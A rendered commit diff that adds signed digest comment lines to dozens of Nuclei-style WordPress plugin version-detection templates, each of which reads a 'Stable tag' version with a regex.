View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502210094d0eca11b8f891f514d94b1b11c90f4902de4ae4a2dfbe60dc74ec0f85e68d102207908f2536b88e23f3d3e87fdad5cd71c09d271a1fc97b60c956cb70cf2824c91:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/contact-form-7.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a004830460221008cff63e255da8df79af32ce59e3a2c2530a514bf1004d47e70ded86a2cc35a0102210083d5b2621b9413907cc36aecedd23ec7974643469438eaa04ee6a932b3126eb1:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502205862ef262127aca9d00afbc79271ad5ca1e193cf7718779648f0ad040c71b3ae022100d8e8cd5d90e29c0bcc2cc62e9d88683ff16a768aeb3174c51dbb148248fdf047:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/cookie-law-info.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a004630440220023e69fc04adc072ac93fbf2fe984338551f0e452e32c1ab7c04ca2d75ae2fed02200ba7a065b1bfe6368df0d70ce91b727d712bd20d264c6a58f497fb91edc876c1:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/cookie-notice.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a004630440220507d9d4bfa2e5155cad3fd71933ec97cdcc221683f3c4632fca11808bf638845022067776641d875281c708f8a63bf409317f6bba8c777af54020994c21fe0babaad:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/copy-delete-posts.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100dafdee73f80a85d9a28716b29404b23d9a9767c72e53d87d859456f673410702022100f85d798b14660f5fa0b6d5fc253cfc72e33551a428ed3596c2b06e07527005c5:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a0048304602210082a6f894d18059997b41cfc18914f54470b61f2dd1cd06616f706a452b7e180b02210085a44e7b80584b5595b09581db46b363eb04c95b16b571e99a50ef01c60a1d02:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502202565ce8d44e5e6e1a802843019a503ccf14500ce540bd6a4e41599e4c12d5b65022100cb5a4b71b3076dc166c263330dd2002601b9a59c6e2728ab91df1f45ba5d2fee:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/custom-css-js.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100fe4f9e08ba42816d69e127a7b936778e02b66f0da505879034fe7a5673c4c750022067e86bde7d7b4a97fd135af67fde9e2e58a1f08c425bc98f3d56ea9db39d25c8:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/custom-fonts.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100c53b6b47c10087900587d7e4392a0ebd493338680380490c974aad42973b7349022100b28441649bdb2fb8c5985ec83c49e00f11fa95229362ac911cc4018ff82a9bbc:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/custom-post-type-ui.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502202c339126ee7d19be138042d8bc3b7967c217dd9f15d89569c633ed6d6c89a946022100b8f54df740a6110ea06e072af32e09785045f46fedf9c629857491ad69c46944:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/disable-comments.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100ad3e76fda39e50a3cb3889650fb8442be14ca7bd3d426cc026e4efa60c57f3dd02206dc7204e92dec6a881f874409d394c52ccc109b8d7eabf16b9ca817b39377a2b:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/disable-gutenberg.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502203f19a400d2383ef61dee72b3cd7d6ed34af02266c6258b7f383821253e251dfb0221008a4847cc2c9b76d21b0e42c752635c291d7544e4b086542b5a114f80d6ca7b46:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/duplicate-page.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402204d2bac0cc63462c0644803ec97cc8aba90440698ba371a4989cbe25fef95402502202c54fd38feb680d0c96291406a9de40a27b80a0c708557194c0539952e36bba0:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/duplicate-post.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402201ae892133315a7220c2248993fd0eadd8f96334198a6064333e7aae670893dac022026d955bd0b1c9aad73f7578c9ada6f539b0c48c386139a61ed7ac51b6f4c6794:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/duplicator.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100ecbf58e2cad03bbb94cc4467b2e91ed7d7152b16d43bee835bf62acfff029e2502201d9fb60e76cb8e3e2ddcdf06c725e669e4384fb02b73a9820e7ee4d9da6394db:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100bd6b7328fe5faffa32fb59622f9db833243a6329df37c2497065ea1dd708a35c022100ba47185ab5b6810b19d40c83934d31d0b5e82d32d776eb40518a58413b9d4fcb:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/easy-table-of-contents.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a004630440220142c6116ea45d6df9f2302a60830dc4ae614e3c255bb0c5c6dda75c8b7fe7b50022062bb82a131202995566bc76fff86ac4940779c0e4d89a616b9b041490f150d9e:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/easy-wp-smtp.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100f16945950cc6ddf5ac012b22d816ed0bf6b41506f14c08d0499a07a3fb4ffc15022052bbb33e4ee3607a37d159f763ec3d8cffab19d266cda42146fb3dfced578bef:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/elementor.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100837f2201fd5abc5b6208463fe9a7d9723eaa6f6de4cf6596c4f8e4dc21edc761022045aefb16b79a152ee585b60e31b5209a0d6e0c054575f54028275adda811ba4c:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/elementskit-lite.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022022f048a7014f3a29bd85474009c4f28f1236ead89b9aadb6bd7b504c5a2cbcdd022100c39aa09aad47d52ff6422e4169ca4ff55202b5d60e5d27ba2055e91b2815a4c0:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/enable-media-replace.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402206fa6f8009f35eac29d31373f0aaa62e3b177c9768564709f079d9571aebc56b30220037da0aa3c25268ef1013afa27ab255ec7bcf8edcb5ba875b7c029470d428b02:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/envato-elements.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100fba44e21da653e1b31eeb56bad8f11025f37bd6248d2734e1ba93f5ed69c30de02207c8233e24b7f12d70323054022df8a32d9d5066f03ea432d6381b7148e66fd41:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100b03db039acc42646e565a6672c9c82028918b0bcfacdd14d5858f32dbb117f8e02206b9c07cfc1d878929f9548f513d5858e5e8c012ccb71600ad0d4553a74560336:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100e8747962ab454a528306b85980e421c70770816f16f1c751ccce151657aa14ad022012e3a22102cbcb65611716c6bc57e214cde05b9ddd844de1936ca13f9f948ec0:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/extendify.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100f67c43c4c235ef5c167af29261e17c5e4dc96bfbaf3ef0782389c638099f8669022100c25743e3f6a061e519a7b5181ddf0efcbd94bc8a656882cec7f3585019520088:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450220590853e09b4871691cc36b3b074790ce5e82ef4368a3e3a698878f3c4a6e278d022100b0d2140a996af5ba2b9c918b520dfc419bfaf930954191010b22d882425f1172:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/fast-indexing-api.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100e3d60b94e05bfd807f4faabf03964db6940ecf42cf5c351fcfc43ccaa28bd690022100c1f7a3cf37daf11b2ed10ac02675fa608b41e4572fcf5c58d0e162ebd78dea9f:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/flamingo.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502201c9d19740238ada408fd96e88243625cb81f26edf53b61649ef8cfad26009fcd022100d82caabf4277a47de76ca86616c752afd7aa9e1908b93882b2876ccd3b273b79:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/fluent-smtp.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450221008a2aa019e7836422ab81ede4bfdb4a45742e07a04ac0ffd1ef5cfb02f2cfc8b40220587e11ec7258e59001a1e489328ad7d074146b4280ed881f6ded14a2c72c1f7a:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/fluentform.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a004830460221009304617a3b736fe84e781c98931a4f200795bcb1aa378fb9a6f413aeb020122c022100b5ae23df05dd028e343dd5e04fb5a8d416f44fcd136117f0fac9e439bad1b320:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/font-awesome.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502206c9ad85a68da733d399404989b39e5fc901737223205ca65b5ab1c91097a688f02210093db3a5775bfab8e926958caa4b17d56f98d36594e4c76a686179bc14ccae3ae:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100ba88b401ae7931ed27ef9b72ae18d597c9d521df086bff97db80b41a81a52b5802210082d41c7dfcf15f36032adeeac78610e5208722c6f87bf6936896a49e55b27c78:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/formidable.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100cabd5e3b35a51197116e6ec83879d1bbc8316a4de209005052f9834c4a386b69022002c69a38c19997d71e8da1d08f01f0887072951c525a03cf3f74dac544287681:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/forminator.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100ddaa92b1aa8a0176605c83b9ae347a43d467ad3c9ee4cc00f23dbe9d1445129d022100c1172ba4648ffcb8a5bab3605669c3c1a14547646163ab44c7cbf82a74d52e9c:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/ga-google-analytics.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502207a61f5f4aacebf4df1ce4197aca4fac5507d1e8dc943d39d8c20e820ec77754e022100d90d7a8cc1ef5fba34286bd15f46b5d94ebbfc6e64be20c53ff0fbcd8b016fe6:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a00463044022034dd401daeb221640139a5344a375db03e3a76ad3a8523fcd266595c49730ed602201fdcf39c59ff69c7776ac67052ff483b71b4238268fc6c855628793456c5b7e5:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502201da7bebf55b861e1eb7176f91f6733c9b99817b0595b88a1bdc96347ccdc1f54022100c2902cf6b193cb6942eec02edf755be8b14687fba65de3f9f4196103c26bc7ac:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402205492ccc5bb159a425b5e1975391ecdb5919bddce78facc71982b5ca44f54008802203bd8578ec4fd54c186e14206154fd8026b037c57c10e89471b9904d527fb75b8:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/google-listings-and-ads.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100af1158da46ff7695fe83ef2baf6547f8bf24b7bbabe9f0b67fa1e8a72218ab61022100a10b1fbc04f44f675da49e2da2ededf2aa2c0ebceeb41309a05b5ea042084389:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/google-site-kit.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022008a40b6f57dba513814e3177b6e5af9b92d7197d750bbeb77da3260291afd917022100ee3105baac95ded6e02e2404eb48a0a2f74248a00709711cfb4a48382e551aa9:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/google-sitemap-generator.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100fc40d5f4319fd03404b88991e3bd91c1c61d73c5a44d9d40832b92fd4d6722a1022008f54dcd5f04c0fbe547bc98ee4a57ee440c24f58ff4e327913cc0cd7ece07a6:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/gtranslate.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402207cb159bca364de9caa2b6493cf0025355ca529c9f8309e66f24fd1bbc669780f022077f183fbb8047bec6b7abc7945c92ba60a6c9fe32633ab03556b4e78b6d0d9d4:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/gutenberg.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402203d382c6f422d33e1cd0366f19b7fc93e065f317a0ff0a1fdd3d69d8bbfbd9892022079713e626e1ddbf224e9c0760fb20029b898fbd4fbd86493cf21547a1d13e7b3:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/happy-elementor-addons.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a004830460221008154d36e69f20ba57a1d1ef02f29464634cbdb7880294185b469c93d88eb968c022100eee7ea9580bff18c29fd23bc863255f56f359b3d440c1d4ec3695386b6264a7a:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/header-footer-code-manager.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100fef1470dd186bad73997df6dcd6cb35a2af9362f44846eb3f7d4519f8b4715f102202a02713619ae40cd22022a570b8e2d6abc5d3bb30982fa1b3db1d09df3fc26a8:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/header-footer-elementor.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100a3c2bcadd2519af6af099c9e9cab4f2903ce09c4460cc1496328280acfed9ce4022013a77ecd1e5402f7c1b3b1c5b76a1688540f34574476bd569e7a0f2e0d1141b6:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/header-footer.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502210085ca52537704983ae97254a4d48ca0b919759c406763a46f9f9715968e220ff002204b1be189424c213481e4ccb6b132d2830440ff9e12de133965380486952cffaf:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/health-check.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022046e685f53e14068d9dfc4fa42b04ceef7e8275fe63cf8d0e4458d61b37867582022100895ac18217337f1b2072263dcdf58845d0d09d19a6440564b6d771379b0ad28b:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/hello-dolly.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502201ffb37fb44f43ac796f15ba4bd46abf1794a4a6418ec046e7de056804c2603f50221008d1bcb10b0c32c677f4f4c9f7d24095540aa3699e5abc2b8c3d6c54a12232a56:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/host-webfonts-local.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100c6c0bfd2732e1a9e07eadcfe9f8c81d87b7e424b71d797ff715b9fcb90a6d61d02201dff670180a6c3f9accd16e75dc5a5d6a6a8bb71fe1de9120c09d0219515c9b4:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/hostinger.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100cf9bea06d371f05ab5400672884ca915368a6957d42fc652e7f313617f3e75390220329004d55597df3f1c2a41800c02043ed2cdb4cd3e7be052b1d65f3101118f9b:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/image-optimization.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100ff1cc35df8a0b68ec33c3914d72d30a5f00e506a7de8f82f06b4b91d5ab5f9ed022100af87309cd302586964d97c4eae8dfcefcdbc72da76fcfbead3516aca6bde24b0:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/imagify.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502203fe1ef8d4c6d2911f616f120f11a3d30a091381aebce15549ac1e092b45124240221008316cfe027870d68f66ee853f4fb56b411ac041b550dd2e3155500b45dfe992d:922c64590222798bb761d5b6d8e72950

1
http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
View File

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100e556d96b19c73914755b08d60e6d11af79ac85ed6ac89d019e9056b6106e7d2602204309dfe4df03775c2eb99bfb0bf98a1e02f8f28d55f894fbcabb6fa6748d4152:922c64590222798bb761d5b6d8e72950

Some files were not shown because too many files have changed in this diff Show More